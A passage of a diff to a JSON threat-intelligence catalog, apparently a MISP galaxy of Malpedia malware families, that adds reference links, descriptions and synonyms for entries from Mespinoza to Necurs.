"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/", - "https://twitter.com/campuscodi/status/1347223969984897026" + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/", + "https://twitter.com/campuscodi/status/1347223969984897026", + "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/" ], "synonyms": [ "pysa" @@ -21302,7 +24300,7 @@ "value": "Mespinoza" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin", @@ -21314,7 +24312,7 @@ "type": [] }, "uuid": "750c5b2c-1489-4e11-b21d-c49b651d9227", - "value": "MetadataBin Ransomware" + "value": "MetadataBin" }, { "description": "", @@ -21344,12 +24342,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf", "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md", "https://blog.ensilo.com/metamorfo-avast-abuser", "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://cofense.com/blog/autohotkey-banking-trojan/", "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", + "https://twitter.com/MsftSecIntel/status/1418706916922986504", "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767" ], @@ -21361,22 +24361,44 @@ "uuid": "18dc3e7a-600d-4e5f-a283-86156b938530", "value": "Metamorfo" }, + { + "description": "A wiper used in an attack against the Iranian train system.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.meteor", + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/", + "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/", + "https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "066250ee-9279-47ad-b289-e266ede11921", + "value": "Meteor" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter", + "https://asec.ahnlab.com/ko/26705/", "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", + "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", + "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/", "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", "https://redcanary.com/blog/getsystem-offsec/", "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/", "https://blog.morphisec.com/fin7-attacks-restaurant-industry", + "http://www.secureworks.com/research/threat-profiles/gold-franklin", "http://schierlm.users.sourceforge.net/avevasion.html", - "https://us-cert.cisa.gov/ncas/alerts/aa20-301a" + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", + "http://www.secureworks.com/research/threat-profiles/gold-winter" ], "synonyms": [], "type": [] @@ -21384,6 +24406,24 @@ "uuid": "13a5c0ae-8e2d-4a38-8b6c-7d746e159991", "value": "Meterpreter (Windows)" }, + { + "description": "A botnet that used Tor .onion links for C&C.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mevade", + "https://www.youtube.com/watch?v=FttiysUZmDw", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/", + "https://blog.fox-it.com/2013/09/05/large-botnet-cause-of-recent-tor-network-overload/" + ], + "synonyms": [ + "SBC", + "Sefnit" + ], + "type": [] + }, + "uuid": "3454bd71-29e1-498b-82d8-111aeadedee5", + "value": "Mevade" + }, { "description": "", "meta": { @@ -21401,7 +24441,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot", - "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/" + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", + "https://twitter.com/GossiTheDog/status/1438500100238577670" ], "synonyms": [ "BLame", @@ -21437,6 +24478,19 @@ "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", "value": "Micrass" }, + { + "description": "Open-source lightweight backdoor for C2 communication. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor", + "https://github.com/cr4sh/microbackdoor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07c7b7dc-cec8-4542-b351-ce7d757812d7", + "value": "MicroBackdoor" + }, { "description": "", "meta": { @@ -21464,6 +24518,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", + "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", "https://research.checkpoint.com/apt-attack-middle-east-big-bang/", @@ -21488,6 +24543,19 @@ "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", "value": "Mikoponi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.milan", + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5b1fe92d-9a78-4543-8efb-7c674492d0d2", + "value": "Milan" + }, { "description": "", "meta": { @@ -21507,7 +24575,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum", "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf" + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://securelist.com/wildpressure-targets-macos/103072/" ], "synonyms": [], "type": [] @@ -21521,26 +24590,37 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", "https://blog.xpnsec.com/exploring-mimikatz-part-1/", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", + "http://www.secureworks.com/research/threat-profiles/gold-burlap", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/", + "https://www.secureworks.com/research/samsam-ransomware-campaigns", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.ic3.gov/Media/News/2021/210527.pdf", + "https://www.ic3.gov/Media/News/2021/210823.pdf", + "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf", "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf", "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "http://www.secureworks.com/research/threat-profiles/gold-franklin", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.ic3.gov/media/news/2020/200917-1.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://www.secureworks.com/research/threat-profiles/cobalt-hickman", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://www.slideshare.net/yurikamuraki5/active-directory-240348605", "https://github.com/gentilkiwi/mimikatz", - "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two", "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf", "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", + "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153", "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", - "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", "https://twitter.com/swisscom_csirt/status/1354052879158571008", "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", @@ -21551,26 +24631,40 @@ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf", + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection", "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", "https://www.hvs-consulting.de/lazarus-report/", + "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/", + "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", + "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.secureworks.com/blog/ransomware-deployed-by-adversary", + "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/", "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", + "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf", "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021", + "https://www.accenture.com/us-en/blogs/security/ransomware-hades", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", - "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", - "https://www.secureworks.com/research/threat-profiles/gold-kingswood" + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware" ], "synonyms": [], "type": [] @@ -21583,10 +24677,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge", + "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures", "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html", - "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism", + "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat", "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/" ], "synonyms": [ @@ -21620,6 +24715,8 @@ "https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html", + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", + "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/", "https://www.secureworks.com/research/threat-profiles/iron-hemlock" ], "synonyms": [], @@ -21673,6 +24770,20 @@ "uuid": "2edd3051-b1b5-47f2-9155-8c97f791dfb7", "value": "Mirai (Windows)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast", + "https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924", + "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "be347289-5ca5-4b49-b5ef-8443883736c1", + "value": "MirrorBlast" + }, { "description": "", "meta": { @@ -21707,6 +24818,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu", "https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/", + "https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces" ], "synonyms": [ @@ -21779,11 +24891,25 @@ "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", "value": "Mocton" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.modirat", + "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1f36d78b-6f3d-469e-8a60-5ecaebe9d80a", + "value": "MoDi RAT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe", + "https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data", "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/" ], "synonyms": [], @@ -21808,6 +24934,19 @@ "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", "value": "ModPOS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_MOFKSYS.A/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "818a9036-a74f-4017-af07-cba9a471b316", + "value": "Mofksys" + }, { "description": "", "meta": { @@ -21870,9 +25009,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", + "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east", "http://www.clearskysec.com/iec/", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", - "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", + "https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/" ], "synonyms": [], "type": [] @@ -21939,6 +25080,19 @@ "uuid": "3de9ccf5-4756-4c5b-9086-6664f5a9b761", "value": "MoriAgent" }, + { + "description": "This tool is a passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them. This forms a covert channel over which attackers are able to issue shell commands and receive back their outputs.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya", + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4dd511a6-be5f-40ae-9a9f-aaf354f7ea2e", + "value": "Moriya" + }, { "description": "", "meta": { @@ -21966,6 +25120,19 @@ "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", "value": "Morto" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moserpass", + "https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0dc319a2-96b5-420d-85ec-07f34f457402", + "value": "Moserpass" + }, { "description": "", "meta": { @@ -21989,12 +25156,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker", + "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry", + "https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/", "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", + "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines", + "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/", "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/", "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/", - "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/", - "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html" + "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/", + "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html", + "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/", + "https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker", + "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/" ], "synonyms": [], "type": [] @@ -22044,7 +25220,7 @@ "value": "MPKBot" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec", @@ -22054,7 +25230,7 @@ "type": [] }, "uuid": "1e301d67-cd12-4f46-bcb3-c60f9b78c4d0", - "value": "MrDec Ransomware" + "value": "MrDec" }, { "description": "", @@ -22102,7 +25278,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf" + "https://www.wired.com/2017/03/russian-hacker-spy-botnet/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group" ], "synonyms": [], "type": [] @@ -22128,6 +25306,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs", + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/" @@ -22196,6 +25375,19 @@ "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", "value": "MyloBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystery_snail", + "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c9b5b0b2-45af-43f2-8eb4-e13493c1342e", + "value": "MysterySnail" + }, { "description": "", "meta": { @@ -22282,7 +25474,9 @@ "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], - "synonyms": [], + "synonyms": [ + "Sacto" + ], "type": [] }, "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", @@ -22305,23 +25499,30 @@ "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://goggleheadedhacker.com/blog/post/11", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://malwareindepth.com/defeating-nanocore-and-cypherit/", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a" + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "Nancrat", @@ -22378,11 +25579,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", + "https://www.youtube.com/watch?v=rfzmHjZX70s", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" ], - "synonyms": [], + "synonyms": [ + "JinhoSpy" + ], "type": [] }, "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", @@ -22394,10 +25599,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan", "https://www.youtube.com/watch?v=1WfPlgtfWnQ", - "https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan", + "https://vblocalhost.com/uploads/VB2020-20.pdf", "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9", - "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", - "https://vblocalhost.com/uploads/VB2020-20.pdf" + "https://twitter.com/ESETresearch/status/1441139057682104325?s=20", + "https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan", + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" ], "synonyms": [], "type": [] @@ -22405,6 +25611,21 @@ "uuid": "85056c54-f8f1-4a98-93cb-322cc1deb52c", "value": "nccTrojan" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nebulae", + "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf", + "https://twitter.com/SyscallE/status/1390339497804636166", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos" + ], + "synonyms": [], + "type": [] + }, + "uuid": "76c75ed0-95ba-4393-8020-4400bdc49de6", + "value": "Nebulae" + }, { "description": "", "meta": { @@ -22412,6 +25633,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", + "http://www.secureworks.com/research/threat-profiles/gold-riverview", "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", @@ -22422,6 +25644,7 @@ "https://www.secureworks.com/research/threat-profiles/gold-riverview", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + 